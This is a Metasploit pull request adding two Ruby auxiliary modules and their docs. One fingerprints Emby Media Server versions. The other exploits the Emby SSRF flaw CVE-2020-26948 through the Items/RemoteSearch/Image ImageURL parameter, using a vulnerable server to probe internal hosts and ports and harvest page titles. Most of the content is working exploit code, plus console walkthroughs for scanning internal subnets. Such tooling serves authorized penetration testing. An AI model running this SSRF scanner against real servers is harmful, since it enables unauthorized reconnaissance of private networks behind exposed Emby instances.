### PR TITLE
Emby ssrf

### DIFF
--- a/documentation/modules/auxiliary/scanner/emby_scan.md
+++ b/documentation/modules/auxiliary/scanner/emby_scan.md
@@ -1,0 +1,55 @@
+## Vulnerable Application
+This module has been tested on Emby Media Server versions older than 4.5.
+
+## Description
+
+Generates a GET request to the provided web servers and executes an SSRF against the targeted EMBY server. Returns the server header, HTML title attribute and location header (if set). This is useful for rapidly identifying  web applications on the internal network using the Emby SSRF vulnerability (CVE-2020-26948).
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/emby_scan`
+  2. Do: `set rhosts [ips]`
+  3. Do: `set emby_server [emby_server_ip]`
+  4. Do: `run`
+
+## Options
+
+
+**PORTS**
+
+Select which ports to check for HTTP servers internal to the Emby server. Defaults to 80, 8080, 8081, 8888.
+
+
+**EMBY_SERVER**
+
+IP address of the Emby server to use. Required.
+
+
+**EMBY_PORT**
+
+Emby server access port. Defaults to 8096.
+
+**SHOW_TITLES**
+
+If set to `false`, will not show the titles on the console as they are grabbed. Defaults to `true`.
+
+**STORE_NOTES**
+
+If set to `false`, will not store the captured information in notes. Use `notes -t http.title` to view. Defaults to `true`.
+
+## Scenarios
+
+### Emby Scan Internal 192.168.1.0 Network
+
+  ```
+msf6 > use auxiliary/scanner/emby_scan
+msf6 auxiliary(scanner/http/title) > set RHOSTS 192.168.1.0/24
+RHOSTS => 192.168.1.0/24
+msf6 auxiliary(scanner/http/title) > set EMBY_SERVER 10.10.10.1
+RHOSTS => 192.168.1.0/24
+
+msf6 auxiliary(scanner/emby_scan) > run
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```

--- a/documentation/modules/auxiliary/scanner/http/emby_version.md
+++ b/documentation/modules/auxiliary/scanner/http/emby_version.md
@@ -1,0 +1,44 @@
+## Vulnerable Application
+This scanner should work on any version of Emby Media Server. Data returned would depend on configuration settings server-side.
+
+## Description
+
+Generates an API request to the provided ip addresses in order to ascertain the Emby server version, if possible. Returns the server version, URI, and internal IP address (if provided). This is useful for rapidly identifying  vulnerable Emby servers that may be susceptible to CVE-2020-26948.
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/http/emby_version`
+  2. Do: `set rhosts [ips]`
+  3. Do: `run`
+
+## Options
+
+
+**RPORT**
+
+Select which ports to check for Emby server API access. Defaults to 8096.
+
+## Scenarios
+
+### Scan network for Emby Servers
+
+  ```
+msf6 > use auxiliary/scanner/http/emby_version
+msf6 auxiliary(scanner/http/emby_version) > set rhosts 10.10.200.0/24
+rhosts => 10.10.200.0/24
+msf6 auxiliary(scanner/http/emby_version) > set threads 10
+threads => 10
+msf6 auxiliary(scanner/http/emby_version) > run
+
+[*] Scanned  26 of 256 hosts (10% complete)
+[*] Scanned  52 of 256 hosts (20% complete)
+[*] Scanned  78 of 256 hosts (30% complete)
+[*] Scanned 103 of 256 hosts (40% complete)
+[*] Scanned 130 of 256 hosts (50% complete)
+[*] Scanned 154 of 256 hosts (60% complete)
+[*] Scanned 181 of 256 hosts (70% complete)
+[*] Scanned 207 of 256 hosts (80% complete)
+[*] Scanned 231 of 256 hosts (90% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```

--- a/modules/auxiliary/scanner/emby_scan.rb
+++ b/modules/auxiliary/scanner/emby_scan.rb
@@ -8,7 +8,7 @@
 # Software Link: https://emby.media/download.html
 # Version: Prior to 4.5
 # Tested on: Ubuntu, Windows
-# CVE : CVE-2020-26948
+# CVE: CVE-2020-26948
 ##
 
 class MetasploitModule < Msf::Auxiliary
@@ -19,98 +19,88 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'Emby SSRF HTTP Scanner',
-      'Description'    => %q{
+      'Name' => 'Emby SSRF HTTP Scanner',
+      'Description' => '
       Utilizes the SSRF vulnerability in Emby Server prior to 4.5.0 to attempt to pull the
       title tag from internal websites. Based on the vulnerability CVE-2020-26948.
-      },
-      'Author'         => 'Btnz',
-      'Version'        => '1.0.2020.11.17.01',
-      'License'        => MSF_LICENSE
+      ',
+      'Author' => 'Btnz',
+      'Version' => '1.0.2020.11.17.01',
+      'License' => MSF_LICENSE
     )
 
-    deregister_options('VHOST','RPORT','FILTER','INTERFACE','PCAPFILE','SNAPLEN','SSL')
+    deregister_options('VHOST', 'RPORT', 'FILTER', 'INTERFACE', 'PCAPFILE', 'SNAPLEN', 'SSL')
 
     register_options(
       [
-        OptBool.new('STORE_NOTES', [true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]),
-        OptBool.new('SHOW_TITLES', [true, 'Show the titles on the console as they are grabbed', true ]),
-        OptString.new('EMBY_SERVER', [true, "IP to scan (eg 10.10.10.18))", ""]),
-        OptInt.new('EMBY_PORT', [true, "Web UI port for Emby Server (e.g. 8096)", "8096"]),
-        OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "80,8080,8081,8888"])
-      ])
+        OptBool.new('STORE_NOTES', [true, 'Store the captured information in notes. Use "notes -t http.title" to view', true]),
+        OptBool.new('SHOW_TITLES', [true, 'Show the titles on the console as they are grabbed', true]),
+        OptString.new('EMBY_SERVER', [true, 'IP to scan (eg 10.10.10.18))', '']),
+        OptInt.new('EMBY_PORT', [true, 'Web UI port for Emby Server (e.g. 8096)', '8096']),
+        OptString.new('PORTS', [true, 'Ports to scan (e.g. 22-25,80,110-900)', '80,8080,8081,8888'])
+      ]
+    )
   end
+
   def run_host(target_host)
-    begin
-      
-        # Do some checking to ensure data is submitted
-      dports = Rex::Socket.portspec_crack(datastore['PORTS'])
-      if dports.empty?
-        raise Msf::OptionValidateError.new(['PORTS'])
-      end
-      # loop through the IPs
-      dports.each do |p|
-        vprint_status("Attempting http://#{datastore['EMBY_SERVER']}:#{datastore['EMBY_PORT']}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}")
-        uri = "/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}"        
-        
-        res = Net::HTTP.get_response(datastore['EMBY_SERVER'], uri, datastore['EMBY_PORT'])
+    # Do some checking to ensure data is submitted
+    dports = Rex::Socket.portspec_crack(datastore['PORTS'])
+    raise Msf::OptionValidateError, ['PORTS'] if dports.empty?
 
-        # Check for Response
-        if res.nil?
-          vprint_error("http://#{target_host}:#{p} - No response")
-          next
-        end
+    # loop through the IPs
+    dports.each do |p|
+      vprint_status("Attempting http://#{datastore['EMBY_SERVER']}:#{datastore['EMBY_PORT']}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}")
+      uri = "/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}"
 
+      res = Net::HTTP.get_response(datastore['EMBY_SERVER'], uri, datastore['EMBY_PORT'])
 
-        # Retrieve the headers to capture the Location and Server header
-        # Note that they are case-insensitive but stored in a hash
-        server_header = nil
-        location_header = nil
-        if !res.each_header.nil?
-          res.each_header do |key, val|
-            location_header = val if key.downcase == 'location'
-            server_header  = val if key.downcase == 'server'
-          end
-        else
-          vprint_error("#{target_host}:#{p} No HTTP headers")
-        end
-
-        # If the body is blank, just stop now as there is no chance of a title
-        if res.body.nil?
-          vprint_error("#{target_host}:#{p} No webpage body")
-        end
-
-        # Very basic, just match the first title tag we come to. If the match fails,
-        # there is no chance that we will have a title
-        rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
-        unless rx
-          vprint_error("#{target_host}:#{p} No webpage title")
-          next
-        end
-
-        # Last bit of logic to capture the title
-        rx[:title].strip!
-        if rx[:title] != ''
-          rx_title = Rex::Text.html_decode(rx[:title])
-          if datastore['SHOW_TITLES']
-            print_good("#{target_host}:#{p} [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}")
-          end
-          if datastore['STORE_NOTES']
-            notedata = { code: res.code, port: p, server: server_header, title: rx_title, redirect: location_header} #, uri: datastore['EMBY_SERVER'] }
-            report_note(host: target_host, port: p, type: "http.title", data: notedata, update: :unique_data)
-          end
-        else
-          vprint_error("#{target_host}:#{p} No webpage title")
-          next
-        end
+      # Check for Response
+      if res.nil?
+        vprint_error("http://#{target_host}:#{p} - No response")
+        next
       end
 
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      rescue ::Timeout::Error, ::Errno::EPIPE      
+      # Retrieve the headers to capture the Location and Server header
+      # Note that they are case-insensitive but stored in a hash
+      server_header = nil
+      location_header = nil
+      if !res.each_header.nil?
+        res.each_header do |key, val|
+          location_header = val if key.downcase == 'location'
+          server_header = val if key.downcase == 'server'
+        end
+      else
+        vprint_error("#{target_host}:#{p} No HTTP headers")
+      end
 
+      # If the body is blank, just stop now as there is no chance of a title
+      vprint_error("#{target_host}:#{p} No webpage body") if res.body.nil?
 
+      # Very basic, just match the first title tag we come to. If the match fails,
+      # there is no chance that we will have a title
+      rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
+      unless rx
+        vprint_error("#{target_host}:#{p} No webpage title")
+        next
+      end
+
+      # Last bit of logic to capture the title
+      rx[:title].strip!
+      if rx[:title] != ''
+        rx_title = Rex::Text.html_decode(rx[:title])
+        if datastore['SHOW_TITLES']
+          print_good("#{target_host}:#{p} [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}")
+        end
+        if datastore['STORE_NOTES']
+          notedata = { code: res.code, port: p, server: server_header, title: rx_title, redirect: location_header } # , uri: datastore['EMBY_SERVER'] }
+          report_note(host: target_host, port: p, type: 'http.title', data: notedata, update: :unique_data)
+        end
+      else
+        vprint_error("#{target_host}:#{p} No webpage title")
+        next
+      end
     end
-
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+  rescue ::Timeout::Error, ::Errno::EPIPE
   end
-
 end

--- a/modules/auxiliary/scanner/emby_scan.rb
+++ b/modules/auxiliary/scanner/emby_scan.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/btnz-k/msf_emby
+# Exploit Title: Emby SSRF HTTP Scanner
+# Date: 2020.11.17
+# Exploit Author: Btnz
+# Vendor Homepage: https://emby.media/
+# Software Link: https://emby.media/download.html
+# Version: Prior to 4.5
+# Tested on: Ubuntu, Windows
+# CVE : CVE-2020-26948
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Capture
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'           => 'Emby SSRF HTTP Scanner',
+      'Description'    => %q{
+      Utilizes the SSRF vulnerability in Emby Server prior to 4.5.0 to attempt to pull the
+      title tag from internal websites. Based on the vulnerability CVE-2020-26948.
+      },
+      'Author'         => 'Btnz',
+      'Version'        => '1.0.2020.11.17.01',
+      'License'        => MSF_LICENSE
+    )
+
+    deregister_options('VHOST','RPORT','FILTER','INTERFACE','PCAPFILE','SNAPLEN','SSL')
+
+    register_options(
+      [
+        OptBool.new('STORE_NOTES', [true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]),
+        OptBool.new('SHOW_TITLES', [true, 'Show the titles on the console as they are grabbed', true ]),
+        OptString.new('EMBY_SERVER', [true, "IP to scan (eg 10.10.10.18))", ""]),
+        OptInt.new('EMBY_PORT', [true, "Web UI port for Emby Server (e.g. 8096)", "8096"]),
+        OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "80,8080,8081,8888"])
+      ])
+  end
+  def run_host(target_host)
+    begin
+      
+        # Do some checking to ensure data is submitted
+      dports = Rex::Socket.portspec_crack(datastore['PORTS'])
+      if dports.empty?
+        raise Msf::OptionValidateError.new(['PORTS'])
+      end
+      # loop through the IPs
+      dports.each do |p|
+        vprint_status("Attempting http://#{datastore['EMBY_SERVER']}:#{datastore['EMBY_PORT']}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}")
+        uri = "/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}"        
+        
+        res = Net::HTTP.get_response(datastore['EMBY_SERVER'], uri, datastore['EMBY_PORT'])
+
+        # Check for Response
+        if res.nil?
+          vprint_error("http://#{target_host}:#{p} - No response")
+          next
+        end
+
+
+        # Retrieve the headers to capture the Location and Server header
+        # Note that they are case-insensitive but stored in a hash
+        server_header = nil
+        location_header = nil
+        if !res.each_header.nil?
+          res.each_header do |key, val|
+            location_header = val if key.downcase == 'location'
+            server_header  = val if key.downcase == 'server'
+          end
+        else
+          vprint_error("#{target_host}:#{p} No HTTP headers")
+        end
+
+        # If the body is blank, just stop now as there is no chance of a title
+        if res.body.nil?
+          vprint_error("#{target_host}:#{p} No webpage body")
+        end
+
+        # Very basic, just match the first title tag we come to. If the match fails,
+        # there is no chance that we will have a title
+        rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*</title>}im.match(res.body.to_s)
+        unless rx
+          vprint_error("#{target_host}:#{p} No webpage title")
+          next
+        end
+
+        # Last bit of logic to capture the title
+        rx[:title].strip!
+        if rx[:title] != ''
+          rx_title = Rex::Text.html_decode(rx[:title])
+          if datastore['SHOW_TITLES']
+            print_good("#{target_host}:#{p} [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}")
+          end
+          if datastore['STORE_NOTES']
+            notedata = { code: res.code, port: p, server: server_header, title: rx_title, redirect: location_header} #, uri: datastore['EMBY_SERVER'] }
+            report_note(host: target_host, port: p, type: "http.title", data: notedata, update: :unique_data)
+          end
+        else
+          vprint_error("#{target_host}:#{p} No webpage title")
+          next
+        end
+      end
+
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      rescue ::Timeout::Error, ::Errno::EPIPE      
+
+
+    end
+
+  end
+
+end

--- a/modules/auxiliary/scanner/http/emby_version.rb
+++ b/modules/auxiliary/scanner/http/emby_version.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/btnz-k/msf_emby
+# Exploit Title: Emby Version Checker
+# Date: 2020.11.17
+# Exploit Author: Btnz
+# Vendor Homepage: https://emby.media/
+# Software Link: https://emby.media/download.html
+# Version: Prior to 4.5
+# Tested on: Ubuntu, Windows
+# CVE : CVE-2020-26948
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Auxiliary::Scanner
+    include Msf::Auxiliary::Report
+  
+    def initialize
+      super(
+        'Name'           => 'Emby Version Checker',
+        'Description'    => %q{
+            This module attempts to identify the version of an Emby Media Server running on 
+            a host. If you wish to see all the information available, set VERBOSE to true. Based on the vulnerability CVE-2020-26948.
+          },
+        'Author'         => 'Btnz',
+        'Version'        => '1.0.2020.10.09.01',
+        'License'        => MSF_LICENSE
+      )
+  
+      register_options(
+        [
+          Opt::RPORT(8096),
+          OptString.new('BASEPATH', [true, 'The base path, usually just /', '/']),
+          OptInt.new('TIMEOUT', [true, 'Timeout for the version checker', 30])
+        ])      
+
+    deregister_options('VHOST','FILTER','INTERFACE','PCAPFILE','SNAPLEN','SSL')    end
+
+    def to
+        return 30 if datastore['TIMEOUT'].to_i.zero?
+        datastore['TIMEOUT'].to_i
+    end
+
+    def run_host(ip)
+        res = send_request_cgi({
+            'uri' => "#{datastore['BASEPATH']}System/Info/Public",
+            'method' => 'GET'})
+          if res.nil? || res.code != 200
+            vprint_error("[Emby Version] failed to connect")
+            return
+          end
+      
+          result = res.get_json_document
+          print_status("Identifying Media Server Version on #{peer}")
+          print_good("[Media Server] URI: http://#{ip}:#{rport}#{datastore['BASEPATH']}")
+          print_good("[Media Server] Version: #{result['Version']}")
+          print_good("[Media Server] Internal IP: #{result['LocalAddress']}")
+          report_service(:host => rhost, :port => rport, :name => "emby", :info => "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})" )
+          print_status ("All info: #{result.to_s}") if datastore['VERBOSE']
+          report_note(
+              :host  => ip,
+              :port  => rport,
+              :proto => 'tcp',
+              :ntype => "server_version",
+              :data  => result['Version'],
+              :info  => "Media Server v.#{result['Version']}"
+          )
+          print_status("Saving host information.")
+          report_host(
+              :host           => ip,
+              :info           =>  "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})"
+          )
+        end
+  end
+  

--- a/modules/auxiliary/scanner/http/emby_version.rb
+++ b/modules/auxiliary/scanner/http/emby_version.rb
@@ -8,69 +8,71 @@
 # Software Link: https://emby.media/download.html
 # Version: Prior to 4.5
 # Tested on: Ubuntu, Windows
-# CVE : CVE-2020-26948
+# CVE: CVE-2020-26948
 ##
 
 class MetasploitModule < Msf::Auxiliary
-    include Msf::Exploit::Remote::HttpClient
-    include Msf::Auxiliary::Scanner
-    include Msf::Auxiliary::Report
-  
-    def initialize
-      super(
-        'Name'           => 'Emby Version Checker',
-        'Description'    => %q{
-            This module attempts to identify the version of an Emby Media Server running on 
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name' => 'Emby Version Checker',
+      'Description' => '
+            This module attempts to identify the version of an Emby Media Server running on
             a host. If you wish to see all the information available, set VERBOSE to true. Based on the vulnerability CVE-2020-26948.
-          },
-        'Author'         => 'Btnz',
-        'Version'        => '1.0.2020.10.09.01',
-        'License'        => MSF_LICENSE
-      )
-  
-      register_options(
-        [
-          Opt::RPORT(8096),
-          OptString.new('BASEPATH', [true, 'The base path, usually just /', '/']),
-          OptInt.new('TIMEOUT', [true, 'Timeout for the version checker', 30])
-        ])      
+          ',
+      'Author' => 'Btnz',
+      'Version' => '1.0.2020.10.09.01',
+      'License' => MSF_LICENSE
+    )
 
-    deregister_options('VHOST','FILTER','INTERFACE','PCAPFILE','SNAPLEN','SSL')    end
-
-    def to
-        return 30 if datastore['TIMEOUT'].to_i.zero?
-        datastore['TIMEOUT'].to_i
+    register_options(
+      [
+        Opt::RPORT(8096),
+        OptString.new('BASEPATH', [true, 'The base path, usually just /', '/']),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the version checker', 30])
+      ]
+    )
+    deregister_options('VHOST', 'FILTER', 'INTERFACE', 'PCAPFILE', 'SNAPLEN', 'SSL')
     end
 
-    def run_host(ip)
-        res = send_request_cgi({
-            'uri' => "#{datastore['BASEPATH']}System/Info/Public",
-            'method' => 'GET'})
-          if res.nil? || res.code != 200
-            vprint_error("[Emby Version] failed to connect")
-            return
-          end
-      
-          result = res.get_json_document
-          print_status("Identifying Media Server Version on #{peer}")
-          print_good("[Media Server] URI: http://#{ip}:#{rport}#{datastore['BASEPATH']}")
-          print_good("[Media Server] Version: #{result['Version']}")
-          print_good("[Media Server] Internal IP: #{result['LocalAddress']}")
-          report_service(:host => rhost, :port => rport, :name => "emby", :info => "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})" )
-          print_status ("All info: #{result.to_s}") if datastore['VERBOSE']
-          report_note(
-              :host  => ip,
-              :port  => rport,
-              :proto => 'tcp',
-              :ntype => "server_version",
-              :data  => result['Version'],
-              :info  => "Media Server v.#{result['Version']}"
-          )
-          print_status("Saving host information.")
-          report_host(
-              :host           => ip,
-              :info           =>  "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})"
-          )
-        end
+  def to
+    return 30 if datastore['TIMEOUT'].to_i.zero?
+
+    datastore['TIMEOUT'].to_i
   end
-  
+
+  def run_host(ip)
+    res = send_request_cgi({
+                             'uri' => "#{datastore['BASEPATH']}System/Info/Public",
+                             'method' => 'GET'
+                           })
+    if res.nil? || res.code != 200
+      vprint_error('[Emby Version] failed to connect')
+      return
+      end
+
+    result = res.get_json_document
+    print_status("Identifying Media Server Version on #{peer}")
+    print_good("[Media Server] URI: http://#{ip}:#{rport}#{datastore['BASEPATH']}")
+    print_good("[Media Server] Version: #{result['Version']}")
+    print_good("[Media Server] Internal IP: #{result['LocalAddress']}")
+    report_service(host: rhost, port: rport, name: 'emby', info: "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})")
+    print_status "All info: #{result}" if datastore['VERBOSE']
+    report_note(
+      host: ip,
+      port: rport,
+      proto: 'tcp',
+      ntype: 'server_version',
+      data: result['Version'],
+      info: "Media Server v.#{result['Version']}"
+    )
+    print_status('Saving host information.')
+    report_host(
+      host: ip,
+      info: "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})"
+    )
+      end
+  end

--- a/modules/auxiliary/scanner/http/emby_version.rb
+++ b/modules/auxiliary/scanner/http/emby_version.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
       ]
     )
     deregister_options('VHOST', 'FILTER', 'INTERFACE', 'PCAPFILE', 'SNAPLEN', 'SSL')
-    end
+  end
 
   def to
     return 30 if datastore['TIMEOUT'].to_i.zero?
@@ -46,13 +46,13 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     res = send_request_cgi({
-                             'uri' => "#{datastore['BASEPATH']}System/Info/Public",
-                             'method' => 'GET'
-                           })
+      'uri' => "#{datastore['BASEPATH']}System/Info/Public",
+      'method' => 'GET'
+    })
     if res.nil? || res.code != 200
       vprint_error('[Emby Version] failed to connect')
       return
-      end
+    end
 
     result = res.get_json_document
     print_status("Identifying Media Server Version on #{peer}")
@@ -74,5 +74,5 @@ class MetasploitModule < Msf::Auxiliary
       host: ip,
       info: "Emby Server v.#{result['Version']} (LAN:#{result['LocalAddress']})"
     )
-      end
-  end
+    end
+end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

Version Checker: 

- [ ] Start `msfconsole`
- [ ] `auxiliary/scanner/emby_version`
- [ ] Set the RHOST as the vulnerable server IP/Hostname and run (modify RPORT if needed).
- [ ] Module will output the version information gleaned or will return not vulnerable. Notes will be updated.
- [ ] Module does not take any further action.
- [ ] ([Documentation](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/emby_version.md))


SSRF Scanner: 

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/emby_scan`
- [ ] Set the EMBY_PORT and EMBY_SERVER as the vulnerable server IP/Hostname and port.
- [ ] Set the PORT field for ports to check internally.
- [ ] Set RHOSTS as the internal IP addresses to check for.
- [ ] Module will attempt to connect on each port that is listed for each IP address and will return the HTTP Title as a note.
- [ ] Module does not take any further action.
- [ ] ([Documentation](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/emby_scan.md))
